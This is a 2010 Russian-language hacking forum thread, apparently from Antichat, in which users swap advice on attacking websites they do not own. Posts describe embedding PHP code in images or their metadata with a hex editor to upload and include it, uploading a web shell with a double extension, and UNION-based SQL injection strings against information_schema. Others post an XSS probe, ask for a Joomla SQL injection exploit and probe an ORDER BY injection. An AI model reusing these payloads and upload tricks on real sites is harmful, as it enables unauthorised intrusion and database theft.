 |
|
09.10.2010, 21:59
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами:
8772211
Репутация:
56
|
|
Сообщение от iget
Подскажите пожалуйста как в картинку засунуть свой php-код? Ну мне нужно проинклудить картинку вобщем.
Открываешь картинку любым текстовым редактором и в начало или конец вставляешь php код, как в обычный файл. Так же можно вставить код не в сам файл, а в метаданные.
В случае жесткой фильтрации картинки, открываешь hex редактор и вставляешь код на место существующих значений.
|
|
|
09.10.2010, 22:10
|
|
Новичок
Регистрация: 29.03.2009
Сообщений: 8
С нами:
9010347
Репутация:
0
|
|
Сообщение от Redwood
Открываешь картинку любым текстовым редактором и в начало или конец вставляешь php код, как в обычный файл. Так же можно вставить код не в сам файл, а в метаданные.
В случае жесткой фильтрации картинки, открываешь hex редактор и вставляешь код на место существующих значений.
тогда картинка перестает быть картинкой и не загружается на сайт
|
|
|
|
09.10.2010, 22:21
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами:
9061916
Репутация:
0
|
|
Сообщение от iget
тогда картинка перестает быть картинкой и не загружается на сайт
а просто шелл с двойным расширением залить не пробывал?
|
|
|
|
09.10.2010, 22:45
|
|
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
С нами:
10889431
Репутация:
34
|
|
Сообщение от iget
тогда картинка перестает быть картинкой и не загружается на сайт
Если ты делал как тебе сказали через хекс редактор, то картинка остаётся картинкой. скорее всего ты даже не попробовал так делать.
http://dump.ru/file/4831477
вот тебе для теста пхпинфо. Пробуй заливать и инклудить.
|
|
|
|
09.10.2010, 23:03
|
|
Новичок
Регистрация: 01.02.2010
Сообщений: 12
С нами:
8566197
Репутация:
18
|
|
Мне так и не помогли =) Ну ладно, сам разобрался. Ещё вопрос
Есть скуля, ветка 5.1.43
В общем если пытаться вытянуть или посмотреть кол-во таблиц или колонок из information_schema, то сайт перестает грузиться, т.е. долго висит а потом тупо браузер говорит что не может открыть. Пробовал и локально и с дедиков и с хостов (скриптом)
-1404+union+select+concat(database(),0x3A,version() ),2+from+information_schema.tables--+
-1404+union+select+concat(column_name,0x3A,table_na me),2+from+information_schema.columns--+
Если просто
-1404+union+select+concat(database(),0x3A,version() ),2--+
Версию и базу выводит, но при обращении к inf schema перестает грузится. Мож фильтруется from?
В общем что посоветуете? Если интересно поковырять-ссылку дам в пм. Не игнорьте плз =)
|
|
|
|
09.10.2010, 23:07
|
|
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
С нами:
10889431
Репутация:
34
|
|
Сообщение от auth_root
Мне так и не помогли =) Ну ладно, сам разобрался. Ещё вопрос
Есть скуля, ветка 5.1.43
В общем если пытаться вытянуть или посмотреть кол-во таблиц или колонок из information_schema, то сайт перестает грузиться, т.е. долго висит а потом тупо браузер говорит что не может открыть. Пробовал и локально и с дедиков и с хостов (скриптом)
-1404+union+select+concat(database(),0x3A,version() ),2+from+information_schema.tables--+
-1404+union+select+concat(column_name,0x3A,table_na me),2+from+information_schema.columns--+
Если просто
-1404+union+select+concat(database(),0x3A,version() ),2--+
Версию и базу выводит, но при обращении к inf schema перестает грузится. Мож фильтруется from?
В общем что посоветуете? Если интересно поковырять-ссылку дам в пм. Не игнорьте плз =)
хз что может быть... давай сылку в пм.
|
|
|
|
10.10.2010, 07:48
|
|
Новичок
Регистрация: 23.08.2009
Сообщений: 1
С нами:
8798520
Репутация:
0
|
|
Еще кто нибудь объясните, если в поле Логин я ввожу '';!--"=&{()}, и потом просматириваю код страницы, и нахожу что то типа
|
|
|
|
10.10.2010, 14:12
|
|
Новичок
Регистрация: 01.04.2009
Сообщений: 14
С нами:
9005843
Репутация:
10
|
|
Всем привет,
Есть ли у кого эксплоит этой баги:
http://developer.joomla.org/security/news/9-security/10-core-security/315-20100701-core-sql-injection-internal-path-exposure.html
Буду очень благодарен!!
|
|
|
|
10.10.2010, 17:05
|
|
Новичок
Регистрация: 09.10.2010
Сообщений: 3
С нами:
8206166
Репутация:
0
|
|
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]SELECT username FROM users ORDER BY username[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]URL[/COLOR][COLOR="#007700"]][/COLOR][/COLOR]
Is it possible to inject this? I know it is not possible to do union all select.
site.php?orderby=ASC gives ascending and orderby=DESC gives descending.
site.php?orderby=,password gives same as ASC
site.php?orderby=limit 0,1 gives only first username.
site.php?orderby=ASC, 1 gives true (everything ok on site)
site.php?orderby=ASC, 0 gives false (content missing)
orderby=ASC, 1=2 gives true (wtf?)
Any help or way to inject this? Sorry for not speaking Russian! |
|
|
|
10.10.2010, 18:09
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от Malygos
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]SELECT username FROM users ORDER BY username[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]URL[/COLOR][COLOR="#007700"]][/COLOR][/COLOR]
Is it possible to inject this? I know it is not possible to do union all select.
site.php?orderby=ASC gives ascending and orderby=DESC gives descending.
site.php?orderby=,password gives same as ASC
site.php?orderby=limit 0,1 gives only first username.
site.php?orderby=ASC, 1 gives true (everything ok on site)
site.php?orderby=ASC, 0 gives false (content missing)
orderby=ASC, 1=2 gives true (wtf?)
Any help or way to inject this? Sorry for not speaking Russian! http://2600nl.net/2010/05/29/exploiting-sql-injection-in-order-by-clause-mysql-5/
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
